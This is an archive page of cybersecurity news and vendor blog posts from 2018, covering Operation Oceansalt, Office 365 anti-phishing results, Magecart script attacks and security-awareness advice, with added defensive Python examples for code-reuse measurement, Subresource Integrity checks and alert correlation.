Category Archives: Cybersecurity

Vulnerable controllers could allow attackers to manipulate marine diesel engines

Researchers have found several authentication and encryption vulnerabilities in the firmware of marine diesel engine controllers by Norwegian company Auto-Maskin, as well as the accompanying Android app. These security flaws could be exploited by attackers to change the firmware and configuration files, install malware, and perform actions that effectively allow them to take control of a vessel’s engines. The vulnerabilities The four vulnerabilities were unearthed by infosec researchers Brian Satira and Brian Olson, who share … More

The post Vulnerable controllers could allow attackers to manipulate marine diesel engines appeared first on Help Net Security.

Operation Oceansalt research reveals cyber-attacks targeting South Korea, USA and Canada

McAfee released a report announcing the discovery of a new cyber espionage campaign targeting South Korea, the United States and Canada. The new campaign uses a data reconnaissance implant last used in 2010 by the hacker group APT1, or Comment Crew, a Chinese military-affiliated group accused of launching cyber-attacks on more than 141 U.S. companies from 2006 to 2010. The actors of this new campaign have not been identified; however, they reused code from implants … More

The post Operation Oceansalt research reveals cyber-attacks targeting South Korea, USA and Canada appeared first on Help Net Security.

Solving the cloud infrastructure misconfiguration problem

Security incidents involving cloud infrastructure have become a regular occurrence since many organizations began shifting their assets to the cloud. Many of these incidents happen because of misconfiguration. “Cloud misconfiguration is a pervasive issue for a variety of reasons,” says Phillip Merrick, CEO of Fugue. “Development teams might provision cloud infrastructure that contains compliance violations or security vulnerabilities because they either lack sufficient training or there’s a lack of proper controls to ensure compliance up … More

The post Solving the cloud infrastructure misconfiguration problem appeared first on Help Net Security.

Targeted attacks on crypto exchanges resulted in a loss of $882 million

Group-IB has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534 million in crypto was stolen. Crypto exchanges: In the footsteps of Lazarus In … More

The post Targeted attacks on crypto exchanges resulted in a loss of $882 million appeared first on Help Net Security.

Clarity and focus on security required for successful digital transformation

Digital transformation is all around us. Even if you are living under a rock, I am sure you have great Wi-Fi reception and are still able to do your shopping, pay your bills, access entertainment (which is especially important because life under the rock can be boring), and pretty much do everything else you can think of, with just a computer or a smart device with internet access. Things get even more interesting if you … More

The post Clarity and focus on security required for successful digital transformation appeared first on Help Net Security.

Knowing how to define, screen and monitor your third parties is essential to minimizing risk

A new NAVEX Global survey found that more than a third of organizations still use paper-based records or disparate office productivity software to administer their third-party risk assessment and management programs. How best-in-class organizations address third-party risks “There’s a growing realization that third-party risk management should operate within an organization’s larger ethics and compliance program,” said Michael Volkov, CEO of The Volkov Law Group. “Enforcement agencies expect companies to use the same level of automation … More

The post Knowing how to define, screen and monitor your third parties is essential to minimizing risk appeared first on Help Net Security.

‘Operation Oceansalt’ Delivers Wave After Wave

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Figure: Code visualization of the recent Oceansalt sample (2018) alongside the older Seasalt sample (2010).
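A visualization like the one above is usually backed by a similarity measurement. As an added example (not McAfee's tooling, and not the implant bytes), the script below shows the first-pass version of that measurement: byte n-gram sets compared by Jaccard index and by containment, which answers "how much of the older code survives in the newer one". The two samples are constructed inline from seeded pseudo-random bytes, with one region copied from the older sample into the newer one; in real use you would feed each function's bytes or the .text section of the two binaries.

```python
"""
Constructed example of code-reuse measurement with byte n-grams. OLD_SAMPLE and
NEW_SAMPLE are synthetic; they stand in for an older and a newer implant and
are NOT Seasalt or Oceansalt bytes.
"""
import random
from typing import Dict, Set


def ngrams(data: bytes, n: int = 8) -> Set[bytes]:
    """All overlapping n-byte windows of data, as a set (order-insensitive)."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: Set[bytes], b: Set[bytes]) -> float:
    """Symmetric similarity |A and B| / |A or B|; 0.0 for two empty sets."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def containment(old: Set[bytes], new: Set[bytes]) -> float:
    """Share of the OLD sample's n-grams that survive in NEW.

    This answers 'how much of the 2010 code is in the 2018 code', which a plain
    Jaccard index understates whenever the newer sample also carries a lot of
    new code.
    """
    return len(old & new) / len(old) if old else 0.0


def code_reuse_report(old: bytes, new: bytes, n: int = 8) -> Dict[str, float]:
    """Summarise reuse between two byte sequences using windows of n bytes."""
    a, b = ngrams(old, n), ngrams(new, n)
    return {
        "jaccard": round(jaccard(a, b), 3),
        "old_in_new": round(containment(a, b), 3),
        "shared_ngrams": len(a & b),
    }


def _pseudo_bytes(rng: random.Random, length: int) -> bytes:
    """Deterministic filler so the example is reproducible offline."""
    return bytes(rng.getrandbits(8) for _ in range(length))


# Constructed samples: a 1600-byte region copied verbatim from OLD into NEW,
# 400 bytes unique to OLD, and 2000 bytes of new code appended in NEW.
_rng = random.Random(20181018)
_SHARED = _pseudo_bytes(_rng, 1600)
OLD_SAMPLE = _pseudo_bytes(_rng, 400) + _SHARED
NEW_SAMPLE = _SHARED + _pseudo_bytes(_rng, 2000)

if __name__ == "__main__":
    # Expect roughly 0.4 Jaccard but 0.8 containment: most of OLD lives on in NEW.
    print(code_reuse_report(OLD_SAMPLE, NEW_SAMPLE))
```

Reading the two numbers together is the point: a low Jaccard score with a high containment score is the signature of an old implant wrapped in new code, which is the situation the report describes. Raw byte n-grams are sensitive to compiler and relocation differences; production tooling normalises operands or works on disassembled basic blocks before hashing, but the set arithmetic is the same.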

Who is Behind the Oceansalt Attack?

Originally taking the title APT1, the Comment Crew was seen as the threat actor conducting offensive cyber operations against the United States almost 10 years before. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why this campaign should occur now. Regardless of whether this is a false flag operation meant to suggest the rebirth of Comment Crew, the impact of the attack is unknown. One thing is certain, however: threat actors have a wealth of code available for building new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see collaboration not within a group but potentially between threat actors, offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

How Office 365 learned to reel in phish

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Jason Rogers, Principal Group Program Manager at Microsoft.

We recently reported how we measure catch rates of malicious emails for Office 365 Exchange Online Protection (EOP) (available with any Office 365 subscription) and Advanced Threat Protection (ATP) (available as a standalone service or with Office 365 E5).

Today, we’re sharing the results of the enhancements we made to anti-phish capabilities for Office 365 to address impersonation, spoof, and phish content, and internal phish emails sent from compromised accounts. Over the last year, Microsoft's threat analysts have seen threat actors pivot from malware to sophisticated, often targeted phishing campaigns. The scale of these attacks and how quickly users click through on malicious links is shown in Figure 1.

Figure 1. Phish email statistics from Office 365 from January 2018 to September 2018.

Understanding the phish landscape

To develop solutions mitigating these modern phishing campaigns, our engineers rigorously analyzed phish emails in Office 365, uncovering a general pattern of phish campaigns following the path shown in Figure 2.

Figure 2. Phish email campaign pathway from initial reconnaissance to data exfiltration.

Additionally, since Office 365 is one of the world's largest email service providers, Microsoft gains visibility and experience across most, if not all, types of cyber threats. Every day, Microsoft analyzes 6.5 trillion signals, and each month we analyze 400 billion emails, while detonating 1 billion items in our sandbox. This telemetry helps us understand the full spectrum of phish attacks and the sophisticated and varied methods used by attackers, summarized in Figure 3. With this understanding of the phish landscape, our engineers not only designed new capabilities, but also enhanced existing capabilities to address the phishing emails being launched at customers.

Figure 3. Phish emails attack spectrum and variety of attack methods.

Understanding the situation

When we began our journey of enhancing our anti-phish capabilities, we admittedly were not best of breed at mitigating phish. As we alluded to previously, transparency with customers is a core priority at Microsoft. Figure 4 shows the number of phish emails that Microsoft (Office 365) missed in comparison to several other vendors also protecting email for customers within Office 365.

From November 2017 to January 2018, you can see that Office 365 (orange bar in Figure 4) was not the best solution at phish catch. (We previously discussed how we measure phish catch.) The values are based on normalized email volume. As the inset plot shows, the scale of mail volume in Office 365 far exceeds the mail volume of third-party vendors. Fundamentally, this scale is one of our differentiators and strengths, as it offers us much greater depth and breadth into the threat landscape.

Figure 4. Normalized phish email miss from November 2017 to January 2018 in Office 365 email traffic. Inset shows actual mail flow volume.

Solving the problem with our technology, operations, and partnerships

Leveraging our signal from mail flow, the expertise of 3,500 in-house security professionals, and our annual $1 billion investment in cybersecurity, we strategically addressed the growing wave of phishing campaigns. Our engineers determined four categories of phish emails and designed capabilities addressing each type. Figure 5 summarizes the enhancements made to the anti-phish capabilities in Office 365.

Figure 5. Phish email categories and anti-phish enhancements made in Office 365 to address the categories.

Details on all the anti-phish updates for Office 365 are available in the following posts:

While the enhancements are interesting, ultimately, catch rate is the parameter that counts, and it is important to remember that no solution can ever stop all threats. Sometimes misses occur, and the most effective solution will miss the least. To this end, we are very excited to share our phish miss rate from May 1, 2018 to September 16, 2018. As you can see in Figure 6, today, when compared to the same set of vendors that we compared ourselves to in November to January, we exhibit the lowest miss rate of phish emails in Office 365. Figure 6 is the culmination of the incredible focus, drive, and expertise of Microsoft researchers and engineers working together to push the boundaries of threat research, machine learning, and development of algorithms that together provide customers the most impressive and effective protection against phish emails available for Office 365 today.

Figure 6. Normalized Phish Email Miss Rate in Office 365 from May 1, 2018 to September 16, 2018. Inset is a blowup of the graph from August 1, 2018 to September 16, 2018.

While the graph in Figure 6 is illuminating, we also want to share statistics from Office 365 EOP/ATP related to phish mitigation. Figure 7 is a summary of the impact these new anti-phish capabilities across EOP/ATP have had in helping secure Office 365 users, and further showcases our depth and scale into the threat landscape. For those unfamiliar with Office 365 ATP, Safe Links provides time-of-click protection from malicious links in email: the click triggers several protection technologies, including URL reputation checks, machine learning, and link detonation as needed. Recently, Safe Links expanded its capabilities to intra-org emails, making Office 365 ATP the only service to offer this type of protection while ensuring the internal emails remain within the compliance boundary of Office 365. We hope you agree that the anti-phish capabilities have evolved at a remarkable pace and with amazing results.

Figure 7. The impact to end users from the enhanced anti-phish capabilities in Office 365.

Learn more

We hope this post provides a good overview of how we are helping customers with modern phishing campaigns. Please be sure to check out the Ignite session, Secure enterprise productivity with Office 365 threat protection services including EOP, ATP, and Threat Intelligence, where we give more details. Your feedback enables us to continue improving and adding features that will continue to make ATP the premier advanced security service for Office 365. If you have not tried Office 365 ATP for your organization yet, you should begin a free Office 365 E5 trial today and start securing your organization from the modern threat landscape.

The post How Office 365 learned to reel in phish appeared first on Microsoft Secure.

What is Machine Learning – and how can it protect you?

Computers are not only becoming faster, but also smarter. A new technology called “Machine Learning” (or ML for short) is changing the way companies process and analyse information – but these developments have important implications for you too.

So, what is Machine Learning?

Computers that can teach themselves

In the past, computers have been very limited in what they can do. You fed information in, and some pre-configured software analysed that data using some very limited algorithms to generate useful insights. Very large companies could adjust and update those algorithms, but the process takes time, effort and cash.

Machine Learning changes the scenario slightly. Instead of having people build and adjust the algorithm, the computer is trained to do the job on its own. Data is fed into the system, and the ML engine searches for patterns and statistically important information automatically.

Once trained, the Machine Learning system can analyse huge amounts of data more quickly – and more accurately – than a human. Which means that businesses using ML can make decisions more quickly and improve the quality of service they offer to their customers.

What does that mean for you?

Machine Learning is already working behind the scenes at many companies, so you may have encountered it without even realising. Take the Google Translate service for instance. In the past, Google had to program the translation between two languages – like English and Japanese.

Using all the information gathered by their search engine, Google then built the Google Neural Machine Translation (GNMT) to translate between different language pairs. The system can now convert Japanese to Korean without ever having been “taught”. And because the ML teaches itself, the quality and accuracy of translation continues to improve.

Using Machine Learning to keep you safe

Machine Learning can be applied to almost any challenge – including keeping you safe online. For instance, Panda has now integrated artificial intelligence into the Dome product line to better protect its users.

In the past, anti-malware products could only detect known viruses – and there was always a delay between malware being discovered and a fix being developed. Until a fix was released, your computer was unprotected, leaving you at an increased risk of infection.

Our new artificial intelligence-driven system is a lot smarter. Panda Dome monitors every process running on your computer – including the ones you can’t see. It then detects every fluctuation and change, blocking anything suspicious before your computer can be infected.

Panda Dome is constantly learning – from your computer and all the others it is installed on across the world. This allows the anti-malware engine to learn to detect suspicious behaviour even more quickly, blocking malware before it has been officially recognised, categorised and patched. Total security is virtually instant thanks to the power of machine learning.

To learn more about ML-powered anti-malware – and to better protect your computer and smartphone right now – download a free trial of Panda Dome here.

The post What is Machine Learning – and how can it protect you? appeared first on Panda Security Mediacenter.

Endpoint security solutions challenged by zero-day and fileless attacks

There is an endpoint protection gap against modern threats, the results of a recent survey by the Ponemon Institute and Barkly have shown. The organizations polled 660 IT and security professionals to get insight on the state of endpoint security risk, and found that: 64% of organizations experienced a successful endpoint attack in 2018 (a 20% increase from the previous 12-month period). 63 percent say that the frequency of attacks they’re facing has also … More

The post Endpoint security solutions challenged by zero-day and fileless attacks appeared first on Help Net Security.

Why we need to bridge the gap between IT operations and IT security

Thycotic released the findings from its 2018 VMworld survey of more than 250 IT operations professionals which looked into their experiences in using cybersecurity tools on a daily basis, including their concerns and preferences. According to the findings, even though IT operations personnel help influence the selection of cybersecurity tools, nearly two out of three say complexity in deployment (30 percent) and complexity in daily use (34 percent) are the biggest hindrances in security tool … More

The post Why we need to bridge the gap between IT operations and IT security appeared first on Help Net Security.

Protecting applications from malicious scripts

In 2018, malicious client-side scripts are still posing a problem for large organizations. This year, British Airways revealed that it suffered a data breach in which 380,000 records were exfiltrated. Now, NewEgg has been hit with a similar data breach. This follows a string of attacks from a group known as Magecart, who were also responsible for the publicized data breaches of Ticketmaster and Feedify. Any time malicious JavaScript is loaded onto a critical page– for … More

The post Protecting applications from malicious scripts appeared first on Help Net Security.
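The attacks above work because the browser runs whatever bytes arrive under a trusted script URL. The standard control for that is Subresource Integrity (SRI): the page pins a hash of the script, and the browser refuses to execute a copy that does not match. As an added example (not from the article, and not real skimmer code), the script below computes the integrity attribute at build time and re-implements the check the browser performs at load time, including the strongest-algorithm rule and the one spec behaviour that bites in practice: an attribute that does not parse disables the check rather than failing closed. Both script bodies are constructed stand-ins.

```python
"""
Constructed example of Subresource Integrity generation and verification.
ORIGINAL_JS and TAMPERED_JS are made-up script bodies for the demonstration.
"""
import base64
import hashlib
import hmac
from typing import List, Tuple

_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}  # the only algorithms SRI allows


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI metadata token, e.g. 'sha384-<base64 digest>'."""
    if algo not in _STRENGTH:
        raise ValueError("SRI accepts only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Build-time helper: emit the tag with integrity and crossorigin set."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def _parse(integrity: str) -> List[Tuple[str, str]]:
    """Split the attribute into (algo, base64) pairs, dropping unknown algorithms."""
    out = []
    for token in integrity.split():
        algo, _, rest = token.partition("-")
        if algo in _STRENGTH:
            out.append((algo, rest.split("?")[0]))  # a '?options' suffix is ignored
    return out


def sri_matches(integrity: str, fetched: bytes) -> bool:
    """The browser's check: among tokens of the strongest listed algorithm, any may match.

    Caveat from the spec: if no token parses (typo in the algorithm name, empty
    attribute), the resource loads WITHOUT any integrity check. Lint the
    attributes you ship.
    """
    parsed = _parse(integrity)
    if not parsed:
        return True
    strongest = max(_STRENGTH[a] for a, _ in parsed)
    for algo, expected in parsed:
        if _STRENGTH[algo] != strongest:
            continue
        actual = base64.b64encode(hashlib.new(algo, fetched).digest())
        if hmac.compare_digest(actual, expected.encode("utf-8")):
            return True
    return False


# Constructed script bodies: the reviewed version and a copy with one line appended.
ORIGINAL_JS = b"window.checkout = function () { /* reviewed payment form logic */ };\n"
TAMPERED_JS = ORIGINAL_JS + b"// any appended byte, skimmer or not, changes the digest\n"
INTEGRITY = sri_hash(ORIGINAL_JS)

if __name__ == "__main__":
    print(script_tag("https://cdn.example.invalid/checkout.js", ORIGINAL_JS))
    print("original loads:", sri_matches(INTEGRITY, ORIGINAL_JS))
    print("tampered loads:", sri_matches(INTEGRITY, TAMPERED_JS))
```

SRI pins only the scripts whose tags you control: if an attacker can edit the page itself, they can edit the hash as well, so it complements a Content-Security-Policy and change monitoring on the page rather than replacing them. It also fails closed on purpose; a third-party script that changes on the provider's side will stop loading until the hash is updated, which is the behaviour you want on a checkout page.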

How corporate boards are navigating cybersecurity risks and data privacy

Digital transformation initiatives have transcended beyond the sole domain of IT to involve the entire organization, elevating digital strategy to the top of the board agenda, according to BDO USA. “Developing a strategic path for an organization’s digital transformation and devoting company resources and board oversight to cybersecurity and data privacy are now necessities for businesses to survive and thrive during this time of intense change,” said Amy Rojik, national assurance partner and director of … More

The post How corporate boards are navigating cybersecurity risks and data privacy appeared first on Help Net Security.

Few organizations use cyber wargaming to practice response plan

Nearly half (46 percent) of executive-level respondents to a Deloitte poll say their organizations have experienced a cybersecurity incident over the past year, with more than 1,500 surveyed professionals feeling only “somewhat confident” in their organization’s ability to respond to and remediate a cyber incident. With cybercrime expected to reach $6 trillion annually and no indication of a slowdown in cyber threats, the Deloitte poll taken during a webcast on cyber preparedness and wargaming exposes … More

The post Few organizations use cyber wargaming to practice response plan appeared first on Help Net Security.

NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work

October is National Cyber Security Awareness Month (NCSAM). NCSAM is a great initiative to help educate and inform our friends and family on the importance of taking your digital security seriously. Week Three in particular aims to help users fuse cybersecurity across their work and personal lives and emphasizes the shared responsibility of employees to […]… Read More

The post NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work appeared first on The State of Security.

The Importance of Security Awareness in Our Connected Lifestyle

Not very long ago, people could be seen walking around waving their mobile phones in the air, looking for a network connection. Today, we are talking 5G! Our kids just can’t imagine a world without gadgets and internet! Little kids as young as four can turn on and instruct Alexa, search for new games on smartphones and talk to digital devices.

Moving Toward an Increasingly Connected Lifestyle

Ours is a connected world and we are constantly connected to the internet, be it through our smartphones, digital assistants, gaming and reading devices, laptops, wearable devices, remote monitoring devices like CCTV and many more. While this brings time savings, higher efficiency and greater comfort, there are a few safety checks which, if ignored, may lead to data and identity theft.

I was recently reading an article on the 5G revolution. South Korea, I believe, already enjoys phenomenal browsing and download speeds, and so will the rest of the world very soon. It will also hopefully reduce the lags and connectivity disruptions that we currently experience. More IoT (Internet of Things) devices will come into play and home Wi-Fi routers will have a larger count of devices connected to them. Needless to say, this calls for ensuring maximum security for the router as well as all our devices.

Moreover, we often use public Wi-Fi connections to browse, which exposes us to possible cyber attacks. Often, something as innocuous as using an external storage device or delaying the installation of updates can let malware into the device. What happens if cyber attackers worm their way into our systems? They can spy on us, control our smart devices, and even listen in on our baby monitor, to name a few.

As many countries observe October as Cybersecurity Month, it is the right time to have a discussion on how we can keep our connected homes safe.

Let’s discuss some of the common causes that can lead to device hacking:

  • Software updates not installed: security companies and OS vendors keep sending patches that close newly found holes and so strengthen protection against cyberattacks. Delaying patch installation leaves our devices exposed. It is therefore advisable to set updates to automatic.
  • Increasing use of IoT devices: our smartwatches, smartphones, digital assistants and digital toys are all connected to Wi-Fi. This offers cyber criminals a bigger hunting ground, and they look for and exploit vulnerabilities in these devices.
  • Outdated security: despite being aware of the risks of not securing devices with licensed, comprehensive software, we often neglect this important step. At best, we download free security tools that may not offer cover against more sophisticated attacks.
  • Carelessness of users: the security chain also includes us, the users. We may click on malicious links, download infected files or visit unsafe websites, making it easy for cyber criminals to target us.

How to use smart devices safely:

  • Use unique, complex passphrases: strong passphrases (not passwords, you will notice) go a long way in keeping hackers at bay. If the thought of remembering several passphrases daunts you, use a password manager.
  • Set up autolock: set up autolock and PIN protection on your devices. Modern devices offer biometric locks as well; make use of them.
  • Keep auto update turned on: this way your OS and security tools always receive patches and updates on time and you get maximum protection.
  • Check security settings before buying IoT devices: before buying any connected toy or device, research the manufacturer to find out whether they give security top priority. Check the security they offer and change the default passcodes. Also read the terms and conditions to learn how the vendor plans to secure your data.
  • Secure your home Wi-Fi router: as this is the point of connection to the net, the router needs to be secured with a strong passphrase. It’s a good idea to change the passphrase from time to time. Keep an eye on data consumption too.
  • Install and run licensed comprehensive security software: don’t go for free, your devices and your personal data are at stake here. Instead, use a comprehensive security solution to protect your technology.
  • Be aware: awareness pays. If you know of the latest threats doing the rounds, you will take the necessary precautions and can share your knowledge with friends and family.

We can do it, can’t we? A few simple measures help secure our digital lives and allow us to take full advantage of what tech has to offer. Let us be ready to welcome 5G in our lives.

Stay safe, stay secure!


The post The Importance of Security Awareness in Our Connected Lifestyle appeared first on McAfee Blogs.

Working Together to Ensure Better Cybersecurity

For many, it’s hard to picture a work environment that doesn’t revolve around the use of technology. Digital, cloud-based services coupled with access through mobile and IoT devices have completely reshaped organizations by streamlining business processes and enabling people to work anywhere, anytime. Thanks to these advances, there have also been a variety of recent shifts in how employers and employees interact with each other, ranging from liberal remote work policies to companies asking employees to bring their own devices to work.

Often these changes feel remarkable and convenient, as they make our work lives much more efficient – but these advancements also create concerns around cybersecurity. Many devices contain both personal and professional data, and when we take our work home or on the go with us, we’re not constantly protected by a company firewall, safe Wi-Fi, or other standard cybersecurity measures. Regardless of what industry you are in, online safety is no longer just IT’s problem. Cybersecurity is now a shared responsibility between an organization and its employees.

Naturally, these changes require education and communication around cybersecurity best practices in order to develop positive habits that will keep both employers and employees safe. Getting a habit to stick also requires an organization to develop a culture of security in tandem, in which every individual and department is accountable for cybersecurity and bands together with the shared objective of staying secure.

October is National Cybersecurity Awareness Month, which is a great time to look at how everyone can be a part of the cybersecurity solution within their organization. If cybersecurity has historically not been a priority within an organization, starting a conversation about it can be difficult, whether you’re an employee or an employer. Consider using these tips to start thinking about personal cybersecurity and how that translates into an overall cybersecurity plan within your organization.

Employers can take the following steps:

  • Identify which company assets are of greatest value, then ensure security measures are in place. Employee, customer, and payment data are all assets that cybercriminals go after, whether through phishing, malware, stolen passwords, or denial-of-service (DoS) attacks. Begin to develop a formal cybersecurity plan based on your specific needs.
  • Set up an alert system. Put a system into place that will alert employees and your organization of an incident. This also includes an avenue for employees to report problems they might notice before they become widespread. The sooner people know about a vulnerability, the faster they can respond and take action.
  • Develop a response plan. Practice an incident response plan to contain an attack or breach. Keep in mind the goal of maintaining business operations in the short term while assessing the long-term effects of the cyber incident.

Employees can follow these guidelines:

  • Regularly update your device’s software. This is the easiest way to ensure your devices are equipped with vital patches that protect against flaws and bugs that cybercriminals can exploit.
  • Take security precautions, even if your company isn’t there yet. Professional and personal information is often intertwined on our devices – especially our mobile phones. Keep all your data secure with comprehensive mobile security, such as McAfee® Mobile Security. Then work within your organization to develop a cybersecurity plan that works for all.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Working Together to Ensure Better Cybersecurity appeared first on McAfee Blogs.

2018 US voter records offered for sale on hacking forum

Somebody is selling US voter registration databases on an English-language dark web hacking forum, and the offer comes with the promise that they will be updated every week, Anomali and Intel 471 researchers have discovered. About the databases for sale The databases include information about voters of 19 US states: Montana, Louisiana, Iowa, Utah, Oregon, South Carolina, Wisconsin, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, Tennessee, South Dakota, Mississippi, West Virginia and Texas. Anomali … More

The post 2018 US voter records offered for sale on hacking forum appeared first on Help Net Security.

9 in 10 organizations have a cybersecurity culture gap

With cybersecurity threats continuing to escalate worldwide, the ISACA/CMMI Institute Cybersecurity Culture Report found that just 5 percent of employees think their organization’s cybersecurity culture is as advanced as it needs to be to protect their business from internal and external threats. Cybersecurity culture is a workplace culture in which security awareness and behaviors are integrated into everyone’s daily operations, as well as an executive leadership priority. In a threat-ripe environment, an effective cybersecurity culture … More

The post 9 in 10 organizations have a cybersecurity culture gap appeared first on Help Net Security.

You are who you say you are: Establishing digital trust with the blockchain

Over the last few years, blockchain use has gained popularity driven partly by the interest in cryptocurrency, but mostly with the growing understanding of what distributed ledger technology can enable through decentralization of trust. Most large companies have innovation teams looking at ways that blockchain technology can be applied, and many analyst firms, system integrators and other influencers have focused teams providing advice on applications of blockchain technology. I have spoken to experts at leading … More

The post You are who you say you are: Establishing digital trust with the blockchain appeared first on Help Net Security.

Exploring the current state of employee knowledge in cybersecurity and data privacy

Seventy-five percent of professionals pose a moderate or severe risk to the corporate data of the companies they work for. According to MediaPRO’s third-annual State of Privacy and Security Awareness Report, workers in the financial sector are more likely to be a risk with 85 percent of survey respondents falling into one of the two risk categories. MediaPRO surveyed more than 1,000 employees across the U.S. to quantify the state of privacy and security awareness … More

The post Exploring the current state of employee knowledge in cybersecurity and data privacy appeared first on Help Net Security.

Legacy government networks stifle cloud migration

67 percent of government agencies’ legacy network infrastructures are simply not prepared to handle the cloud migration lift or keep pace with the changing demands of cloud and hybrid networks, according to MeriTalk. One of the biggest areas holding agencies back is the chaos and lack of prioritization to properly update networks necessary for cloud adoption and IT modernization efforts, 51 percent of managers reported. Respondents also noted that to reach their cloud goals, agencies … More

The post Legacy government networks stifle cloud migration appeared first on Help Net Security.

CYBER ARMS – Computer Security: Basic Security Testing with Kali Linux Giveaway Contest

Want a chance to get a signed copy of my latest Kali Linux book? I am giving away a total of 10 signed copies of “Basic Security Testing with Kali Linux, 3rd Edition”!

Simply follow, like and share this article, or my official Twitter or Instagram announcement, for a chance to win a signed copy of my new book!

10 lucky winners will be randomly selected on October 31st.

The Contest is for those living in the United States only. I may do another one for international readers in the future.

Liking this article & sharing the Official Contest announcements on Twitter and Instagram will increase your chances of winning. Winners will be notified on October 31st. If a winner cannot be notified or does not respond by the end of the first week of November, another winner will be picked.

Good luck!

CYBER ARMS – Computer Security

Microsoft Secure: Making it real—harnessing data gravity to build the next gen SOC

This post was coauthored by Diana Kelley, Cybersecurity Field CTO, and Siân John, EMEA Chief Security Advisor, Cybersecurity Solutions Group.

In our first blog, Diana and I talked about the concept of data gravity and how it could, conceptually, help organizations take a more cloud-ready approach to security operations and monitoring. In this post we address the question: How do we make this a reality in the security operations center (SOC) while we are under increased and constant pressure from motivated threat actors?

The answer lies in a new approach to monitoring called Security Orchestration, Automation and Response (SOAR), which is founded upon addressing the challenge of connecting and investigating issues across multiple security platforms. SOAR addresses the challenge of evolving security operations beyond the traditional security information and event management (SIEM) model into one that allows correlation across all the data gravity wells. Core to this is being able to take an event from one system (for example an endpoint like a laptop) and correlate it in real time across different systems, such as a mail hygiene gateway, in order to build evidence and apply the context needed for a fast and efficient investigation. This is something that analysts have historically done manually to investigate an issue: look across multiple different evidence points to find the information behind an event and determine whether it's a false positive or needs further investigation. Historically, deciding which incidents need investigation was left to the SIEM model, but as we discussed in the last blog, both the difficulties with false positives and the rules of data gravity make this harder to achieve.

Let's discuss how this can be achieved using Microsoft as an example.

We have a number of significant areas of data gravity within the technology that Microsoft customers use. These are Office 365, Windows, and Azure, each with a different focus and level of protection, and these are the areas we need to bring together to share insights and events across them. This is where the Intelligent Security Graph comes into play for us. It is a subset of the Microsoft Graph focused specifically on sharing the security information and insights that we see across our infrastructure:

Each of the areas of security products we have integrated with the graph allows us to share insights across different areas and build orchestration capability, context, and automation across systems without necessarily having to pull them all into one single aggregated log store. Analysis is done as and when required, often driven by the machine learning and behavioral techniques that help to determine what information is needed.

The next step is to make this information available to others, which is why we released the Graph Security API. This is an open and free API that allows customers to interrogate Microsoft data in real time for the alerts and context that the Office 365, Windows, and Azure security systems hold. This allows organizations to integrate alerts into their own SOC or build automated playbooks and investigations across the platform. This isn't just about orchestrating across Microsoft. The law of data gravity says that we must integrate with others, and many leading security vendors have also integrated with the API, both to feed information into our platform and to query Microsoft in real time for context in their own platforms.

When insights across multiple data gravity wells can be accessed and correlated in near real time, the SOC analyst can spend far less time writing SIEM rules and more time tuning orchestration and automation that is focused on improving insight, reducing false positives, and investigating the important information. The capability that SOC vendors should be focusing on is building a real-time investigation platform that enables analysts to investigate security event signal across multiple vendors in real time, by respecting the laws of data gravity. Meaningful insights and reductions in mean time to identify (MTTI) and mean time to remediate (MTTR) are far better measures of SOC effectiveness than how many events per second (EPS) are processed.
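The cross-system correlation the post describes (an endpoint alert corroborated by a mail-gateway alert for the same user or host, without first pouring both into one log store) is small enough to show in code. The block below is an added example, not Microsoft's code and not part of the original post. It assumes the shape of the Microsoft Graph Security API v1.0 `alert` resource (`vendorInformation.provider`, `hostStates[].fqdn`, `userStates[].userPrincipalName`, `eventDateTime`) and works entirely on constructed sample alerts; the query-URL builder shows how a SOC would ask the API for recent alerts but does not send anything, so the example runs offline.

```python
"""Cross-provider alert correlation: take an alert from one system (an endpoint)
and look for corroborating alerts from a different system (a mail gateway) that
name the same user or host inside a time window.

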